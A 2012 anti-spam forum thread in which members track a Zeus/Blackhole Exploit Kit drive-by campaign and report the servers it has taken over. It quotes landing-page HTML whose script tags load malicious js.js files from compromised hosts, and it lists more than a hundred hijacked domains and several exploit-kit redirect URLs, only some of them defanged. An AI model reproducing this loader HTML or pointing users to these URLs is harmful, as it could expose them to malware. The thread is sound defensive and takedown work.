Numerous malware drive by attempts

A place to discuss malware of every flavor, e.g. Storm, Waledac, Conficker and Zeus

Numerous malware drive by attempts

Postby spamislame » Thu Mar 22, 2012 6:18 pm

In the past three weeks I've seen a sudden rush of all manner of fake notification pushing urls of hijacked servers which attempt to perform several types of malware exploitations.

The messages are always the same kind of format:

- Fake notification from a company. Lately it's been mostly Linkedin notices (some fake person needing a recommendation, etc.)
- Several links each claiming to be for a different thing (Read more, contact us, unsubscribe)
- Each link is a distinct hijacked server.

The hijacked servers always have a randomly named subdirectory and an index file, e.g.:

Code: Select all
http://acte-firma-offshore.ro/Nfy7BLd8/index.html

When you go to one of the hijacked server links, you see a message that says "WAIT PLEASELoading...".

If you view source on these individual pages, you see a string of *other* hijacked servers are supplying the malicious JavaScript code:

Code: Select all
<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="http://mrsmakeit.com/9jrgDjED/js.js"></script>
<script type="text/javascript" src="http://myparacord.com/cxW8X8xp/js.js"></script>
<script type="text/javascript" src="http://thebestguide1.com/arKwG4pE/js.js"></script>
<script type="text/javascript" src="http://www.extrhema.com.br/cVspcegd/js.js"></script>
<script type="text/javascript" src="http://www.industriacaxiense.com.br/HLAeMSAd/js.js"></script>

</html>

Again: randomly named directory and a js file.

So there's an automated process out there that's doing this to (so far) dozens of unsecured, abandoned, long forgotten websites.

So far this week I have reported 53 servers, covering the whole gamut of the hijacked servers. Many of these are completely abandoned or hosted by really obscure, what I refer to as "unmanned" ISP's. No contact address works for some of them, or the ones that do go unanswered. I'd say I'm at about a 40% success rate for getting this suspended or secured.

I've created a really basic tool called the Phishing ReporterAtor™ which certainly makes life easier, but there's got to be some better way of notifying these ISP's and hosting companies that criminals have pwned a large number of their servers.

Having said all of this: none of these messages make it past any spam filter at all, via numerous email providers. (Gmail, Yahoo, etc.) So I have to question the overall success of this malware campaign.

Mostly fyi for now but this is becoming an epidemic.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Mar 22, 2012 10:34 pm

"this is becoming an epidemic"

I attempted to describe some of the malware campaign here:
http://www.mywot.com/en/forum/21464-qai ... -2010-1885

The patterns of the malicious URLs (deceptive landing page, intermediate JavaScript, malware payload) have been easy to spot so far.
NotBuyingIt
Spammer Killing Machine
 
Posts: 612
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Mar 23, 2012 12:24 am

From just the last 2 days, here is a list of 151 hijacked hosts found in spam. Each has an 8 random character string in the URL. They are sequenced by most frequent (127 hits) to least frequent (1 hit)

Code: Select all
futurisima.com.ar
iips.edu.in
industriadaformatura.com.br
grimper.awardspace.com
gri.or.id
escoladailha.com.br
gardenmoveis.com.br
odontofamily.com.br
gerindra.or.id
giftformom.trei.ro
ttest.co.za
oscardelaolla.com.co
tubogas.com.br
peridot.com.vn
ogrodzeniamirko.home.pl
whiteoak.co.za
tatuielegante.com.br
sillinho.bplaced.net
www.andif.com.br
www.damhofer.com
planetafitnessltda.com.br
manczyl.webd.pl
spyder.snowpeak.com.tw
positivacomunicacao.com.br
newsletter.lavorosalute.it
test1991.mebyre.com
nafti.edu.gh
testeaza.trei.ro
lirahost.com.br
twilightbefore.bplaced.net
maxtone.nazwa.pl
www.dentalimplants123.com
seniordatinggroup.co.uk
corporateuniversity.com.br
mirrorfelder.cnh.at
sbemrj.org.br
cpm.borec.cz
istorie.usm.md
revistatempo.com.br
radicalatm.com.ar
intecone.com.br
www.elisaviscontinetwork.com
aluguechacaras.com.br
ayvitour.com.ua
chusto.lviv.ua
scsuprema.com.br
www.eventakustik.de
www.eurowire.it
aashirwad.com.hk
www.fitratder.org
mail2.direct.ee
balihai1.tempsite.ws
wp10647654.wp274.webpack.hosteurope.de
visualdesenvolvimento.com.br
ufmi.com.my
rlinux.moderna.com.br
rajniti.co.in
videos.newmotion.at
thebeautiq.com.au
suitesdojo.com.br
sospiscinaspr.com.br
romero12.mserwis.pl
revistalabarra.com.co
laseresp.com.mx
s373104026.online.de
municipioderawson.gob.ar
rmraguapura.com.br
afrohealing.co.za
smileshop.com.au
praxedysadesivos.com.br
hassansaeed.99k.org
ocgcoaching.co.il
rygy.com.br
micmusz.webd.pl
lulu.com.co
www.izaz.com.br
www.hoegie.be
marcusxl.blink.pl
z8mm.com.br
gfpesquisas.com.br
www.kadinmuhendisler.org
redleafapartments.co.in
saofranciscodocorumbau.com.br
oguzhanguzel.av.tr
nackageinvestmentgroup.com.au
newsite.itsgroup.it
www.barcuta.ro
www.artdelivery.it
witer.home.pl
v1.globaltransit.net
promocaolilicaetigor.com.br
portal365.freehosting.com
wproduct.99k.org
ssttice.bplaced.net
www.autoreinigung.at
tiborita.altervista.org
support.imatone.fr
scarletcourier.50webs.com
pm.weexcel.in
personnalis.com.br
prakash.clanteam.com
lawsystem.com.br
zegluga.lh.pl
www.cityofsutton.org
travian1000x.zzl.org
quickphoto.com.br
ftp.zimmerrestaurante.com.br
ftp.vilasek.com
www.ismailgunes.web.tr
www.gastrocomplexeu.pl
www.bizsizanayasaolmaz.org
wordpressitalia.altervista.org
vivaleboutique.com.br
ucscad.com.br
snowpeak.com.tw
monochromatic.art.pl
imobiliariacruzeirors.com.br
www.wahbischool.com
www.kemerburgazfutbolokulu.com
www.gruppoenter.eu
www.dimac.com.ar
www.cbac.com
voip.valorizaweb.com.br
vinicolaperini.com.br
travian250x.zzl.org
travelodubai.co.uk
topkids.com.br
tony.web.id
styling.krakow.pl
ssios.com.pk
snakeprotex.com.au
siwy010.webd.pl
shop.madamegrillet.it
seicommat.hospedagemdesites.ws
s391025613.onlinehome.fr
recantopaulista.com.br
radioresgateonline.com.br
pzas.nazwa.pl
proweb1.bplaced.net
piratrilhas.com.br
patentmall.com.my
pasandola.nixiweb.com
osteologia.org.ar
nortonmini.com.ar
metropolis.com.br
mcms.xs2theworld.com
mariotta.com.br
loja.weissblumenn.com.br
ftp.dariocandela.altervista.org
eminenceorganics.com.my
curicica.com.br


SIL, let me now if you need the full URLs for reporting.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby spamislame » Fri Mar 23, 2012 10:51 am

Red Dwarf wrote:SIL, let me now if you need the full URLs for reporting.

Yes please!

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Numerous malware drive by attempts

Postby spamislame » Fri Mar 23, 2012 10:55 am

Gar Warner, as it turns out, just posted about this:

http://garwarner.blogspot.ca/2012/03/ze ... hreat.html

It's Zeus, again (of course.)

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Numerous malware drive by attempts

Postby AlphaCentauri » Fri Mar 23, 2012 2:34 pm

As lame as these appear when they're from the wrong bank, I'm sure they hit lots of people who do use the bank being spoofed, and maybe even a few who share access to an account with the sort of person who needs to do a lot of password resets.
User avatar
AlphaCentauri
You are kiillllling-a my bizinisss!
 
Posts: 5989
Joined: Thu Mar 01, 2007 3:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Mar 23, 2012 3:59 pm

spamislame wrote:
Red Dwarf wrote:SIL, let me now if you need the full URLs for reporting.

Yes please!

SiL

1,500 URLs from the past 3 days sent.
:silthumb: < = silthumb!
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Mar 23, 2012 4:22 pm

spamislame wrote:Gar Warner, as it turns out, just posted about this:

http://garwarner.blogspot.ca/2012/03/ze ... hreat.html

It's Zeus, again (of course.)

SiL


garwarner wrote:In the very most recent of these "BlackHole to Zeus" malware campaigns, LinkedIn is being imitated. The LinkedIn invitation claims to be from "Your classmate", but guess what happens if you click one of the 820 advertised URLs, each disguised as your "friend's" name?

Yes, it loads several redirectors, and then sends them to a Black Hole Exploit kit that infects the visitor with Zeus!

The format matches exactly, a hacked web server, a random 8-character string, index.html (techie grep pattern "/......../index.html")
garwarner wrote:promocaolilicaetigor.com.br / VJBqqR5H / index.html

BTW, in that particular example - The requested URL /VJBqqR5H was not found on this server.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby Red Dwarf » Fri Mar 23, 2012 4:44 pm

Here are some of the js.js second level URLs. The usual warnings apply - do not load these
Code: Select all
<script type="text/javascript" src="http://boemelparty.be/vnB4GozT/js.js"></script>
<script type="text/javascript" src="http://bscert.eu/CAgADsB0/js.js"></script>
<script type="text/javascript" src="http://chroniquesradios.com/7KnKEoKm/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/cJHrkMSb/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/Th5Da66c/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/YfTXsaR5/js.js"></script>
<script type="text/javascript" src="http://www.frogeen.com/hPPP5CqE/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/H5WkxY8X/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/8cACpVEr/js.js"></script>


The domains / web servers are
boemelparty.be
bscert.eu
chroniquesradios.com
nhb.prosixsoftron.in
sas.hg.pl
hXXp://www.alpine-turkey.com
hXXp://www.frogeen.com
hXXp://www.thedugoutdawgs.com
hXXp://www.vinhthanh.com.vn


[EDIT] More added
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10542
Joined: Tue Jun 27, 2006 2:01 am

Re: Numerous malware drive by attempts

Postby spamislame » Fri Mar 23, 2012 5:26 pm

I reported around 50 of these so far (both the js.js hosts and the /#########/index.html hosts)

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Mar 29, 2012 5:29 am

I am uncertain, but it seems to me that somebody is doing web development on one of these Zeus black hole exploits at the moment (or just before I posted this) at

hXXp://50.116.50.82/showthread.php?t=d7ad916d1c0396ff
Last edited by NotBuyingIt on Thu Apr 05, 2012 12:37 pm, edited 1 time in total.
NotBuyingIt
Spammer Killing Machine
 
Posts: 612
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby spamislame » Thu Mar 29, 2012 10:10 am

NotBuyingIt wrote:I am uncertain, but it seems to me that somebody is doing web development on one of these Zeus black hole exploits at the moment

...

Or rather: was. :twisted:

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Mar 29, 2012 12:49 pm

spamislame wrote:Or rather: was. :twisted:

Ah! The botnet domain clearschooner.com (Creation Date: 28-mar-2012) has been suspended; its registrar MONIKER ONLINE SERVICES, INC has set its status to clientHold. Its DNS (monikerdns.net) continues to associate it with IP 50.116.50.82 on the Linode Network in the USA; however the server at that IP address appears to have gone offline. :silthumb:

It may be productive to examine any similarly named domains which were created near the same time as clearschooner.com
NotBuyingIt
Spammer Killing Machine
 
Posts: 612
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Sat Mar 31, 2012 11:35 am

I believe that the following article refers to some of these drive-by attempts

http://garwarner.blogspot.com/2012/03/u ... lware.html

Canadian translation:

http://garwarner.blogspot.ca/2012/03/us ... lware.html

(Note: The blog will not render properly on an iPad.)
NotBuyingIt
Spammer Killing Machine
 
Posts: 612
Joined: Sun Jun 13, 2010 5:22 pm

Re: Numerous malware drive by attempts

Postby NotBuyingIt » Thu Apr 05, 2012 12:32 pm

These deceptive URLs (presumably found in spam that, I am guessing, are spoofs of PayPal in this case)

    aluguelciroimoveis.com.br/9ZT4hYfA/index.html
    eltekmuhendislik.com/PX34vf6P/index.html
    erinteltelekom.com.tr/2qkQiMnF/index.html
    estutrans.co.id/zSfdvN78/index.html
    homeartbornova.com/ZQe8w6UJ/index.html

all link to web pages that are coded to load several of these "intermediate" JavaScript files at at time

    demo.auctionsiteforlease.com/u8J3B832/js.js
    guzel-macrame.com/mNv2hTDq/js.js
    osakaledpanel.com/NSAPcnkz/js.js
    scoalapelinie.scienceontheweb.net/AdbZZbva/js.js
    travelhelper.biz/PBzpAEjg/js.js
    usmedicalit.com/ebv60BkK/js.js
    www.walscape.com/Bi7L9NvW/js.js
    yesconvites.com/JcCFzYq7/js.js

The intermediate scripts redirect to a malicious website such as

    50.116.35.146/showthread.php?t=73a07bcb51f4be71
    209.59.218.94/showthread.php?t=73a07bcb51f4be71

The intermediate JavaScript files seem to be revised from time to time to alter the redirection target. Perhaps the repeated revisions of the JavaScript files is a technique that has replaced the fast-flux ploy of manipulating DNS which Zeus botnets had been using.

[Edit: Add] Today, Dmitry Tarakanov of Kaspersky Lab Poland is using the term polymorphism to generally characterize the frequent code changes in the current set of Zeus malware campaigns.
See http://www.viruslist.pl/weblog.html?weblogid=785
NotBuyingIt
Spammer Killing Machine
 
Posts: 612
Joined: Sun Jun 13, 2010 5:22 pm

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 1 guest

cron